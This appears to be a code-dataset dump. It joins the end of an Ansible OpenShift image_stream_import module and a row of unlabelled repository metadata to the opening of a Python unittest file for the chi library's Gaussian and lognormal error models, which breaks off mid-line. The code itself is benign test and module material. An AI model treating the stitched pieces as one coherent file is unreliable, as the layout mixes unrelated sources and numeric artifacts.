to change on PUT operations. Populated by the system.
Read-only.
type: str
signed_claims:
description:
- Contains claims from the signature.
type: complex
contains: str, str
type:
description:
- 'Required: Describes a type of stored blob.'
type: str
status:
description:
- Status is the status of the image import, including errors encountered
while retrieving the image
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may
define its own extended details. This field is optional and
the data returned is not guaranteed to conform to any schema
except that defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with
the StatusReason failure. Not all StatusReasons may provide
detailed causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot
and postfix notation for nested attributes. Arrays
are zero-indexed. Fields may appear more than once
in an array of causes due to fields having multiple
errors. Optional. Examples: "name" - the field "name"
on the current resource "items[0].name" - the field
"name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the
error. If this value is empty there is no information
available.
type: str
group:
description:
- The group attribute of the resource associated with the
status StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the
status StatusReason. On some operations may differ from
the requested resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the
status StatusReason (when there is a single name which
can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation
should be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of
this object that can be used by clients to determine when
objects have changed. Value must be treated as opaque
by clients and passed unmodified back to the server. Populated
by the system. Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in
the "Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does
not override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
tag:
description:
- Tag is the tag this image was located under, if any
type: str
status:
description:
- Status reflects whether any failure occurred during import
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may define
its own extended details. This field is optional and the data
returned is not guaranteed to conform to any schema except that
defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with the
StatusReason failure. Not all StatusReasons may provide detailed
causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot and
postfix notation for nested attributes. Arrays are zero-indexed.
Fields may appear more than once in an array of causes
due to fields having multiple errors. Optional. Examples:
"name" - the field "name" on the current resource "items[0].name"
- the field "name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the error.
If this value is empty there is no information available.
type: str
group:
description:
- The group attribute of the resource associated with the status
StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the status
StatusReason. On some operations may differ from the requested
resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the status
StatusReason (when there is a single name which can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation should
be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of this
object that can be used by clients to determine when objects
have changed. Value must be treated as opaque by clients and
passed unmodified back to the server. Populated by the system.
Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in the
"Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does not
override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
'''
def main():
    """Entry point: build the Ansible helper module and execute it.

    Raises a plain ``Exception`` if the helper itself cannot be
    constructed (there is no module object yet, so ``fail_json`` is not
    available); otherwise failures during execution are reported through
    the module's own ``fail_json``.
    """
    try:
        module = OpenShiftAnsibleModule('image_stream_import', 'V1')
    except OpenShiftAnsibleException as exc:
        # The helper failed to init, so there is no module object. All we can
        # do is raise the error. Use str(exc) rather than exc.message:
        # BaseException has no .message attribute on Python 3, so accessing
        # it would raise AttributeError and hide the original error.
        raise Exception(str(exc))
    try:
        module.execute_module()
    except OpenShiftAnsibleException as exc:
        module.fail_json(msg="Module failed!", error=str(exc))
if __name__ == '__main__':
    main()
| 52.748223
| 105
| 0.487207
| 12,096
| 126,121
| 5.054729
| 0.058036
| 0.022211
| 0.023306
| 0.013739
| 0.929917
| 0.922884
| 0.914576
| 0.912515
| 0.910045
| 0.906644
| 0
| 0.003041
| 0.486422
| 126,121
| 2,390
| 106
| 52.770293
| 0.940901
| 0.00088
| 0
| 0.737705
| 0
| 0.002102
| 0.996095
| 0.015499
| 0
| 0
| 0.000286
| 0
| 0
| 1
| 0.00042
| false
| 0.008827
| 0.022699
| 0
| 0.02438
| 0.000841
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98e1b675f5e8a4b54170f62d19df182b0bd3f2cc
| 56,910
|
py
|
Python
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 2
|
2021-12-09T17:35:36.000Z
|
2022-03-17T13:45:06.000Z
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 30
|
2021-07-30T08:55:17.000Z
|
2022-03-21T21:55:54.000Z
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 2
|
2021-08-04T15:07:21.000Z
|
2021-12-15T11:42:31.000Z
|
#
# This file is part of the chi repository
# (https://github.com/DavAug/chi/) which is released under the
# BSD 3-clause license. See accompanying LICENSE.md for copyright notice and
# full license details.
#
import unittest
import numpy as np
import chi
class TestConstantAndMultiplicativeGaussianErrorModel(unittest.TestCase):
    """
    Tests the chi.ConstantAndMultiplicativeGaussianErrorModel class.

    The model has two parameters ``(sigma_base, sigma_rel)``; judging from
    the reference scores below, the total standard deviation is
    ``sigma_tot = sigma_base + sigma_rel * X^m`` where ``X^m`` is the model
    output (NOTE(review): inferred from the test arithmetic — confirm
    against the chi implementation).
    """
    @classmethod
    def setUpClass(cls):
        # One shared instance for all tests; the model itself is stateless
        # apart from its parameter names.
        cls.error_model = chi.ConstantAndMultiplicativeGaussianErrorModel()
    def test_compute_log_likelihood(self):
        # Tests :meth:`compute_log_likelihood` and
        # :meth:`compute_pointwise_ll`
        # Test case I: If X = X^m, the score reduces to
        # -np.log(2pi)/2 - np.log(sigma_tot)
        # Test case I.1:
        parameters = [1, 0.1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 1)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        # Pointwise log-likelihoods are one score per observation and must
        # sum to the total log-likelihood.
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case I.2:
        parameters = [1, 0.1]
        model_output = [10] * 10
        observations = [10] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 10)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II: If sigma_tot = 1, the score reduces to
        # -np.log(2pi)/2 - (X-X^m) / 2
        # Test case II.1:
        parameters = [0.9, 0.1]
        model_output = [1] * 6
        observations = [2] * 6
        ref_score = -3 * np.log(2 * np.pi) - 6 * (1 - 2)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (6,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II.2:
        parameters = [0.9, 0.1]
        model_output = [1] * 10
        observations = [10] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III: -Infinity for not allowed regimes
        # (non-positive sigma_base or sigma_rel)
        # Test case III.1: Zero sigma_base
        parameters = [0, 0.1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.2: Negative sigma_base
        parameters = [-1, 0.1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.3: Zero sigma_rel
        parameters = [1, 0]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.4: Negative sigma_rel
        parameters = [1, -1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
    def test_compute_log_likelihood_bad_input(self):
        # Model output and observations don't match
        parameters = [1, 0.1]
        model_output = ['some', 'length']
        observations = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_log_likelihood(
                parameters, model_output, observations)
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_pointwise_ll(
                parameters, model_output, observations)
    def test_compute_sensitivities(self):
        # Test case I: If X = X^m, the scores reduce to
        # L = -np.log(2pi)/2 - np.log(sigma_tot)
        # dL/dpsi = -sigma_rel/sigma_tot * dx/dpsi
        # dL/dsigma_base = -1/sigma_tot
        # dL/dsigma_rel = -x/sigma_tot
        # Test case I.1:
        parameters = [1, 0.1]
        model_output = [1] * 10
        observations = [1] * 10
        # dx/dpsi at each of the 10 time points: 1 w.r.t. psi_0, 2 w.r.t.
        # psi_1 (shape (n_times, n_parameters)).
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 1)
        ref_dpsi_0 = -10 * 0.1 / (1 + 0.1) * 1
        ref_dpsi_1 = -10 * 0.1 / (1 + 0.1) * 2
        ref_dsigma_base = -10 / (1 + 0.1)
        ref_dsigma_rel = -10 / (1 + 0.1) * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        # Sensitivities: (dpsi_0, dpsi_1, dsigma_base, dsigma_rel).
        self.assertEqual(len(sens), 4)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        self.assertAlmostEqual(sens[3], ref_dsigma_rel)
        # Test case I.2:
        parameters = [1, 0.1]
        model_output = [10] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 10)
        ref_dpsi_0 = -10 * 0.1 / (1 + 1) * 1
        ref_dpsi_1 = -10 * 0.1 / (1 + 1) * 2
        ref_dsigma_base = -10 / (1 + 1)
        ref_dsigma_rel = -10 / (1 + 1) * 10
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 4)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        self.assertAlmostEqual(sens[3], ref_dsigma_rel)
        # Test case II: If sigma_tot = 1, the scores reduce to
        # L = -np.log(2pi)/2 - (X-X^m) / 2
        # dL/dpsi = (-sigma_rel + error + error^2*sigma_rel) * dx/dpsi
        # dL/dsigma_base = - 1 + error^2
        # dL/dsigma_rel = - x + x*error^2
        # Test case II.1:
        parameters = [0.9, 0.1]
        model_output = [1] * 10
        observations = [2] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
        ref_dpsi_0 = 10 * (-0.1 + 1 + 1 * 0.1) * 1
        ref_dpsi_1 = 10 * (-0.1 + 1 + 1 * 0.1) * 2
        ref_dsigma_base = -10 + 10 * 1
        ref_dsigma_rel = -10 + 10 * 1 * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 4)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        self.assertAlmostEqual(sens[3], ref_dsigma_rel)
        # Test case II.2:
        parameters = [0.9, 0.1]
        model_output = [1] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
        ref_dpsi_0 = 10 * (-0.1 + 9 + 9**2 * 0.1) * 1
        ref_dpsi_1 = 10 * (-0.1 + 9 + 9**2 * 0.1) * 2
        ref_dsigma_base = -10 + 10 * 9**2
        ref_dsigma_rel = -10 + 10 * 9**2 * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 4)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        self.assertAlmostEqual(sens[3], ref_dsigma_rel)
    def test_compute_sensitivities_bad_input(self):
        # Model output and sensitivities don't match
        parameters = [1, 0.1]
        model_output = ['some', 'length']
        observations = ['some', 'length']
        sens = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The first dimension of'):
            self.error_model.compute_sensitivities(
                parameters, model_output, sens, observations)
    def test_get_parameter_names(self):
        # Default parameter names of the two-parameter model.
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 2)
        self.assertEqual(parameters[0], 'Sigma base')
        self.assertEqual(parameters[1], 'Sigma rel.')
    def test_n_parameters(self):
        self.assertEqual(self.error_model.n_parameters(), 2)
    def test_sample(self):
        # Test I: sample size 1
        # The expected values are regression-pinned draws for this fixed
        # seed; they guard against accidental changes to the RNG usage.
        seed = 42
        parameters = [3, 2]
        n_times = 3
        model_output = [1] * n_times
        sample = self.error_model.sample(parameters, model_output, seed=seed)
        n_samples = 1
        self.assertEqual(sample.shape, (n_times, n_samples))
        self.assertAlmostEqual(sample[0, 0], 3.7952806720457217)
        self.assertAlmostEqual(sample[1, 0], -6.022022696029159)
        self.assertAlmostEqual(sample[2, 0], 0.6469945736947356)
        # Test II: sample size > 1
        n_samples = 4
        sample = self.error_model.sample(
            parameters, model_output, n_samples=n_samples, seed=seed)
        self.assertEqual(sample.shape, (n_times, n_samples))
        self.assertAlmostEqual(sample[0, 0], 2.046212634385726)
        self.assertAlmostEqual(sample[1, 0], -4.115603997796511)
        self.assertAlmostEqual(sample[2, 0], 0.5798718003966126)
        self.assertAlmostEqual(sample[0, 1], 0.13453009521457915)
        self.assertAlmostEqual(sample[1, 1], -4.824303722244952)
        self.assertAlmostEqual(sample[2, 1], -2.920990871528623)
        self.assertAlmostEqual(sample[0, 2], 4.186372271923463)
        self.assertAlmostEqual(sample[1, 2], 3.140421812116401)
        self.assertAlmostEqual(sample[2, 2], 6.0832766019365465)
        self.assertAlmostEqual(sample[0, 3], 2.1031092234071647)
        self.assertAlmostEqual(sample[1, 3], -0.04857959900325241)
        self.assertAlmostEqual(sample[2, 3], 3.024316842149241)
    def test_sample_bad_input(self):
        # Too many parameters
        parameters = [1, 1, 1, 1, 1]
        model_output = [1] * 10
        with self.assertRaisesRegex(ValueError, 'The number of provided'):
            self.error_model.sample(parameters, model_output)
    def test_set_parameter_names(self):
        # Set parameter names
        names = ['some', 'names']
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 2)
        self.assertEqual(parameters[0], 'some')
        self.assertEqual(parameters[1], 'names')
        # Reset parameter names (None restores the defaults)
        names = None
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 2)
        self.assertEqual(parameters[0], 'Sigma base')
        self.assertEqual(parameters[1], 'Sigma rel.')
    def test_set_parameter_names_bad_input(self):
        # Not the right number of names
        names = ['Too', 'many', 'names']
        with self.assertRaisesRegex(ValueError, 'Length of names'):
            self.error_model.set_parameter_names(names)
class TestErrorModel(unittest.TestCase):
    """
    Tests the chi.ErrorModel base class.

    The base class only declares the error-model interface: the compute
    and sample methods raise ``NotImplementedError``, and the getters
    return ``None`` because a bare base instance carries no parameters.
    """
    @classmethod
    def setUpClass(cls):
        # One shared instance suffices; the base class holds no state
        # that the tests below could mutate.
        cls.error_model = chi.ErrorModel()
    def test_compute_log_likelihood(self):
        args = ('some parameters', 'some output', 'some observations')
        with self.assertRaisesRegex(NotImplementedError, ''):
            self.error_model.compute_log_likelihood(*args)
    def test_compute_pointwise_ll(self):
        args = ('some parameters', 'some output', 'some observations')
        with self.assertRaisesRegex(NotImplementedError, ''):
            self.error_model.compute_pointwise_ll(*args)
    def test_compute_sensitivities(self):
        args = (
            'some parameters', 'some output', 'some sensitivities',
            'some observations')
        with self.assertRaisesRegex(NotImplementedError, ''):
            self.error_model.compute_sensitivities(*args)
    def test_get_parameter_names(self):
        self.assertIsNone(self.error_model.get_parameter_names())
    def test_n_parameters(self):
        self.assertIsNone(self.error_model.n_parameters())
    def test_sample(self):
        with self.assertRaisesRegex(NotImplementedError, ''):
            self.error_model.sample('some parameters', 'some output')
    def test_set_parameter_names(self):
        with self.assertRaisesRegex(NotImplementedError, ''):
            self.error_model.set_parameter_names('some names')
class TestGaussianErrorModel(unittest.TestCase):
    """
    Tests the chi.GaussianErrorModel class.

    The model has a single parameter, ``Sigma``, used directly as the
    standard deviation of the Gaussian error (as the reference scores
    below show).
    """
    @classmethod
    def setUpClass(cls):
        # One shared instance for all tests.
        cls.error_model = chi.GaussianErrorModel()
    def test_compute_log_likelihood(self):
        # Tests :meth:`compute_log_likelihood` and
        # :meth:`compute_pointwise_ll`
        # Test case I: If X = X^m, the score reduces to
        # -np.log(2pi)/2 - np.log(sigma)
        # Test case I.1:
        parameters = [0.5]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        # Pointwise scores are one per observation and sum to the total.
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case I.2:
        parameters = [0.5]
        model_output = [10] * 6
        observations = [10] * 6
        ref_score = -3 * np.log(2 * np.pi) - 6 * np.log(0.5)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (6,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II: If sigma = 1, the score reduces to
        # -np.log(2pi)/2 - (X-X^m) / 2
        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II.2:
        parameters = [1]
        model_output = [1] * 10
        observations = [10] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III: -Infinity for not allowed regimes
        # (non-positive sigma)
        # Test case III.1: Zero sigma
        parameters = [0]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.2: Negative sigma
        parameters = [-1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
    def test_compute_log_likelihood_bad_input(self):
        # Model output and observations don't match
        parameters = [1]
        model_output = ['some', 'length']
        observations = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_log_likelihood(
                parameters, model_output, observations)
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_pointwise_ll(
                parameters, model_output, observations)
    def test_compute_sensitivities(self):
        # Test case I: If X = X^m, the scores reduce to
        # L = -np.log(2pi)/2 - np.log(sigma)
        # dL/dpsi = 0
        # dL/dsigma_base = -1/sigma
        # Test case I.1:
        parameters = [0.5]
        model_output = [1] * 10
        observations = [1] * 10
        # dx/dpsi at each of the 10 time points: 1 w.r.t. psi_0, 2 w.r.t.
        # psi_1 (shape (n_times, n_parameters)).
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
        ref_dpsi_0 = 0
        ref_dpsi_1 = 0
        ref_dsigma_base = -10 / (0.5)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        # Sensitivities: (dpsi_0, dpsi_1, dsigma).
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case I.2:
        parameters = [0.5]
        model_output = [10] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
        ref_dpsi_0 = 0
        ref_dpsi_1 = 0
        ref_dsigma_base = -10 / (0.5)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case II: If sigma = 1, the scores reduce to
        # L = -np.log(2pi)/2 - (X-X^m) / 2
        # dL/dpsi = error * dx/dpsi
        # dL/dsigma_base = - 1 + error^2
        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
        ref_dpsi_0 = 10 * (1) * 1
        ref_dpsi_1 = 10 * (1) * 2
        ref_dsigma_base = -10 + 10 * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case II.2:
        parameters = [1]
        model_output = [1] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
        ref_dpsi_0 = 10 * (9) * 1
        ref_dpsi_1 = 10 * (9) * 2
        ref_dsigma_base = -10 + 10 * 9**2
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
    def test_compute_sensitivities_bad_input(self):
        # Model output and sensitivities don't match
        parameters = [1]
        model_output = ['some', 'length']
        observations = ['some', 'length']
        sens = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The first dimension of'):
            self.error_model.compute_sensitivities(
                parameters, model_output, sens, observations)
    def test_get_parameter_names(self):
        # Default parameter name of the one-parameter model.
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma')
    def test_n_parameters(self):
        self.assertEqual(self.error_model.n_parameters(), 1)
    def test_sample(self):
        # Test I: sample size 1
        # Only the output shape is checked here (no pinned draw values).
        seed = 42
        parameters = [0.5]
        n_times = 3
        model_output = [1] * n_times
        sample = self.error_model.sample(parameters, model_output, seed=seed)
        n_samples = 1
        self.assertEqual(sample.shape, (n_times, n_samples))
        # Test II: sample size > 1
        n_samples = 4
        sample = self.error_model.sample(
            parameters, model_output, n_samples=n_samples, seed=seed)
        self.assertEqual(sample.shape, (n_times, n_samples))
    def test_sample_bad_input(self):
        # Too many parameters
        parameters = [1, 1, 1, 1, 1]
        model_output = [1] * 10
        with self.assertRaisesRegex(ValueError, 'The number of provided'):
            self.error_model.sample(parameters, model_output)
    def test_set_parameter_names(self):
        # Set parameter names
        names = ['some name']
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'some name')
        # Reset parameter names (None restores the default)
        names = None
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma')
    def test_set_parameter_names_bad_input(self):
        # Not the right number of names
        names = ['Too', 'many', 'names']
        with self.assertRaisesRegex(ValueError, 'Length of names'):
            self.error_model.set_parameter_names(names)
class TestLogNormalErrorModel(unittest.TestCase):
    """
    Tests the chi.LogNormalErrorModel class.

    The model has a single parameter, ``Sigma log``, the standard
    deviation of the error on the log scale. The reference scores below
    use a mean shift of ``-sigma^2/2`` on the log scale, which makes the
    lognormal mean equal to the model output.
    """
    @classmethod
    def setUpClass(cls):
        # One shared instance for all tests.
        cls.error_model = chi.LogNormalErrorModel()
    def test_compute_log_likelihood(self):
        # Tests :meth:`compute_log_likelihood` and
        # :meth:`compute_pointwise_ll`
        # Test case I: If log X - log X^m = - sigma^2/2,
        # the score reduces to
        # -np.log(2pi)/2 - np.log(sigma) - np.log(X)
        # Test case I.1:
        parameters = [0.5]
        # Model output chosen so the exponent term cancels exactly.
        model_output = [1 * np.exp(parameters[0]**2 / 2)] * 10
        observations = [1] * 10
        ref_score = \
